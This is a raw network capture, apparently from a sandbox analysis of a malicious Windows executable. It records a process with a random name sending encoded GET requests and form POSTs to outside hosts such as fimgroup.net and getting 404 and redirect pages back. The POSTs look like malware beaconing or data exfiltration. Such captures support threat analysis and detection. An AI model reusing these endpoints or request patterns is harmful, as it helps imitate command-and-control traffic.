Aug 29, 2024 12:25:01.391864061 CEST	591	OUT	GET /m39s/?oLy=-hKdflfxw6&cLStcv3=UQp9655FjW3LvDLkuw2PvKQDrSZERfsuMNaS+TvkLzXyh0NXcttmOremH7COUKcvmncAqxPe6ceu/n78V0Nrg4HMIj+GFDcR1qbYt4rdB9Ep+oQFjrOMsJirX3vFU26KFVbUkuI= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.kiristyle.shop User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Aug 29, 2024 12:25:01.886493921 CEST	517	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 29 Aug 2024 10:25:01 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kiristyle.shop/m39s/?oLy=-hKdflfxw6&cLStcv3=UQp9655FjW3LvDLkuw2PvKQDrSZERfsuMNaS+TvkLzXyh0NXcttmOremH7COUKcvmncAqxPe6ceu/n78V0Nrg4HMIj+GFDcR1qbYt4rdB9Ep+oQFjrOMsJirX3vFU26KFVbUkuI= Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49742	62.149.128.40	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:25:07.002165079 CEST	847	OUT	POST /m3ft/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 212 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.fimgroup.net Origin: http://www.fimgroup.net Referer: http://www.fimgroup.net/m3ft/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 72 6b 55 2f 6a 33 31 31 37 43 31 37 74 77 49 6f 37 51 2b 52 77 72 50 79 70 75 55 53 41 58 6b 6b 6d 47 6b 4b 43 70 4f 39 57 63 4f 65 74 5a 43 54 30 35 56 64 4e 69 4e 43 45 34 58 67 78 6e 2f 53 39 41 75 71 49 6f 7a 55 6a 77 62 6c 74 76 70 46 64 5a 66 2b 6a 6c 4d 79 4d 59 2b 44 4b 71 63 31 2f 51 30 6d 37 6d 52 34 78 65 6a 56 30 6c 57 6a 57 4f 76 46 4b 73 6c 37 41 68 79 79 62 31 2f 63 77 41 64 46 6f 44 2f 4b 77 38 7a 72 69 32 7a 39 4c 74 36 55 45 7a 66 41 73 37 35 53 4d 31 69 71 74 4c 4f 51 63 39 46 72 51 35 72 46 49 74 73 61 71 54 6b 51 74 4d 33 68 61 33 4d 4f 54 2f 44 4b 33 4b 54 68 68 4f 4e 4d 62 59 54 49 Data Ascii: cLStcv3=rkU/j3117C17twIo7Q+RwrPypuUSAXkkmGkKCpO9WcOetZCT05VdNiNCE4Xgxn/S9AuqIozUjwbltvpFdZf+jlMyMY+DKqc1/Q0m7mR4xejV0lWjWOvFKsl7Ahyyb1/cwAdFoD/Kw8zri2z9Lt6UEzfAs75SM1iqtLOQc9FrQ5rFItsaqTkQtM3ha3MOT/DK3KThhONMbYTI
Aug 29, 2024 12:25:07.661725998 CEST	1236	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET Date: Thu, 29 Aug 2024 10:25:06 GMT Connection: close Content-Length: 4948 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
Aug 29, 2024 12:25:07.661753893 CEST	1236	IN	Data Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
Aug 29, 2024 12:25:07.661767960 CEST	448	IN	Data Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
Aug 29, 2024 12:25:07.661781073 CEST	1236	IN	Data Raw: 65 73 3a 3c 2f 68 34 3e 20 0a 20 20 3c 75 6c 3e 20 09 3c 6c 69 3e 54 68 65 20 64 69 72 65 63 74 6f 72 79 20 6f 72 20 66 69 6c 65 20 73 70 65 63 69 66 69 65 64 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 20 6f 6e 20 74 68 65 20 57 65 62 20 73 65 Data Ascii: es:</h4> <ul> <li>The directory or file specified does not exist on the Web server.</li> <li>The URL contains a typographical error.</li> <li>A custom filter or module, such as URLScan, restricts access to the file.</li> </ul> </fields
Aug 29, 2024 12:25:07.661797047 CEST	1011	IN	Data Raw: 64 65 74 61 69 6c 73 2d 72 69 67 68 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c Data Ascii: details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>   http://www.fimgroup.net:80/m3ft/</td></tr> <tr><th>Physical Path</th><td>   D:\inetpub\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49743	62.149.128.40	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:25:09.548841953 CEST	871	OUT	POST /m3ft/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.fimgroup.net Origin: http://www.fimgroup.net Referer: http://www.fimgroup.net/m3ft/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 72 6b 55 2f 6a 33 31 31 37 43 31 37 74 51 34 6f 39 44 57 52 6b 37 50 31 6d 4f 55 53 5a 48 6b 67 6d 48 59 4b 43 73 2b 74 58 75 61 65 73 37 61 54 6d 6f 56 64 59 69 4e 43 4d 59 58 70 75 33 2f 4e 39 41 69 69 49 73 7a 55 6a 77 6e 6c 74 75 5a 46 64 6f 66 2f 67 56 4d 77 41 34 2b 42 46 4b 63 31 2f 51 30 6d 37 6d 46 57 78 65 72 56 30 56 6d 6a 57 72 50 43 45 4d 6c 38 57 78 79 79 52 56 2f 59 77 41 64 6a 6f 43 6a 6b 77 2b 37 72 69 33 44 39 61 66 53 54 4e 7a 66 47 6f 37 34 75 48 41 48 37 74 49 4c 6b 54 64 73 4e 58 71 54 55 45 37 74 41 32 67 6b 7a 2f 63 58 6a 61 31 55 38 54 66 44 67 31 4b 72 68 7a 5a 42 72 55 73 32 72 7a 62 49 44 7a 45 30 78 34 72 48 6d 37 7a 6a 71 4f 34 68 42 66 41 3d 3d Data Ascii: cLStcv3=rkU/j3117C17tQ4o9DWRk7P1mOUSZHkgmHYKCs+tXuaes7aTmoVdYiNCMYXpu3/N9AiiIszUjwnltuZFdof/gVMwA4+BFKc1/Q0m7mFWxerV0VmjWrPCEMl8WxyyRV/YwAdjoCjkw+7ri3D9afSTNzfGo74uHAH7tILkTdsNXqTUE7tA2gkz/cXja1U8TfDg1KrhzZBrUs2rzbIDzE0x4rHm7zjqO4hBfA==
Aug 29, 2024 12:25:10.204216003 CEST	1236	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET Date: Thu, 29 Aug 2024 10:25:09 GMT Connection: close Content-Length: 4948 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
Aug 29, 2024 12:25:10.204233885 CEST	1236	IN	Data Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
Aug 29, 2024 12:25:10.204246998 CEST	1236	IN	Data Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
Aug 29, 2024 12:25:10.204258919 CEST	1236	IN	Data Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>   IIS Web Core</td></tr> <tr><th>Notification</th><td>   MapRequestHandl
Aug 29, 2024 12:25:10.204272985 CEST	223	IN	Data Raw: 74 6f 72 79 20 61 6e 64 20 74 72 79 20 74 68 65 20 72 65 71 75 65 73 74 20 61 67 61 69 6e 2e 20 0a 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 Data Ascii: tory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=404,0,0x80070002,17763">View more information »</a></p> </fieldset> </div> </div> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49744	62.149.128.40	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:25:12.913516998 CEST	1884	OUT	POST /m3ft/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.fimgroup.net Origin: http://www.fimgroup.net Referer: http://www.fimgroup.net/m3ft/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 72 6b 55 2f 6a 33 31 31 37 43 31 37 74 51 34 6f 39 44 57 52 6b 37 50 31 6d 4f 55 53 5a 48 6b 67 6d 48 59 4b 43 73 2b 74 58 75 69 65 74 49 53 54 30 62 74 64 4b 53 4e 43 50 59 58 6b 75 33 2b 52 39 42 4b 6d 49 74 50 45 6a 32 6a 6c 38 39 42 46 62 61 33 2f 33 46 4d 77 4f 6f 2b 41 4b 71 64 33 2f 51 45 69 37 6d 56 57 78 65 72 56 30 54 69 6a 52 2b 76 43 4a 73 6c 37 41 68 79 2b 62 31 2b 2f 77 44 74 64 6f 43 6e 61 77 4f 62 72 69 58 54 39 4a 4b 4f 54 43 7a 66 45 76 37 34 32 48 41 43 6a 74 4c 2b 64 54 64 70 6d 58 70 50 55 48 64 6b 2b 6a 42 42 70 6e 36 4c 2b 44 57 6f 66 55 59 4c 66 74 62 33 4e 6c 49 39 6b 52 35 53 72 33 66 49 76 6d 43 4a 77 7a 37 6e 5a 6b 46 33 37 64 4a 67 4f 43 6a 34 5a 66 32 43 43 58 55 45 34 50 30 6a 38 77 42 4f 51 70 38 51 2b 53 65 70 47 33 4c 33 51 6c 59 35 50 62 52 70 44 51 55 79 71 62 73 37 73 58 34 6b 79 41 36 45 59 56 6c 4d 71 57 36 46 32 70 65 54 65 77 43 72 44 66 4f 63 53 2b 33 6a 65 65 6b 4d 65 68 71 47 4b 39 34 6c 77 54 75 33 67 44 67 6e 46 32 48 61 35 6c 48 [TRUNCATED] Data Ascii: cLStcv3=rkU/j3117C17tQ4o9DWRk7P1mOUSZHkgmHYKCs+tXuietIST0btdKSNCPYXku3+R9BKmItPEj2jl89BFba3/3FMwOo+AKqd3/QEi7mVWxerV0TijR+vCJsl7Ahy+b1+/wDtdoCnawObriXT9JKOTCzfEv742HACjtL+dTdpmXpPUHdk+jBBpn6L+DWofUYLftb3NlI9kR5Sr3fIvmCJwz7nZkF37dJgOCj4Zf2CCXUE4P0j8wBOQp8Q+SepG3L3QlY5PbRpDQUyqbs7sX4kyA6EYVlMqW6F2peTewCrDfOcS+3jeekMehqGK94lwTu3gDgnF2Ha5lHTo1bJXxJDVPgAV135Hsemb/rknnqEfoL1zae4FQuesVccKwh0o5iy6VDeXhKjLhlNy9D2nqFMVX6XDmrv7PRyvWL16/PfAhNIkXxAZsy49ZgZP6Dba/qQ0vP+le85ILg2Y5Q8+hk2yNWzcbtvSfE9V6cijWjatAL6PFVrKm8FYPkwtxoPsh9xebMuuYhJpO4Xh9KO4NAfzM2T9mkTGlIhY3X3keggZrjkG03+Lq9qCw/9eD3OFI0FCohg0JW6BQddkLcVwtulizkfRHTyGTXRFdv4V18RCw6FpXh1W4mG+lJNHfwPdWNeUrBqs7ZzpTiDQXY/YdKdN2gWfOOUc1jR2fHNITzPSlTLJQQqA8jYZgdgoQ51u7LrImAEWdk+iBFbAh5yzTOn9F8CBGGjCAmnky7D0+hL6Z+HThPzPEVOp4tBrSDbbS9SK4272ExP1m1ag/JEF49i/w4fMx3a97MIbN54+44QRuK1wtagywgjDRfPQEHc7XQMKDhTy1wUQim+UBJKLp8CX4x+szygZpo94hTtwsvsLHIwgkNa9/RdyM9WPTlpdLaHQL1E3qHf4AwPHm12/wMz4EHcNSqCzD8x2VpogJVM9C0cXYZNbZv9ikv/KUb+9mRSW5IBkGlvzpaLq7S13kECLlYsR0OJAc8mZbFs/UiBAU1zO [TRUNCATED]
Aug 29, 2024 12:25:13.583628893 CEST	1236	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET Date: Thu, 29 Aug 2024 10:25:12 GMT Connection: close Content-Length: 4948 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
Aug 29, 2024 12:25:13.583699942 CEST	224	IN	Data Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;
Aug 29, 2024 12:25:13.583712101 CEST	1236	IN	Data Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 43 38 37 42 32 3b 20 0a 7d 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 Data Ascii: background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .content-container p{margin:0 0 10px 0; }#details-left{
Aug 29, 2024 12:25:13.583722115 CEST	1236	IN	Data Raw: 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20 0a 20 20 3c 68 34 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65 Data Ascii: >HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> </div> <div class="content-container"> <fieldset><h4>Most likely causes:</h4> <ul> <
Aug 29, 2024 12:25:13.583735943 CEST	1235	IN	Data Raw: 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c 65 72 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68 3e 48 61 6e 64 6c 65 72 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 Data Ascii: bsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>   StaticFile</td></tr> <tr><th>Error Code</th><td>   0x80070002</td></tr> </table> </div> <div id="details-right">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49745	62.149.128.40	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
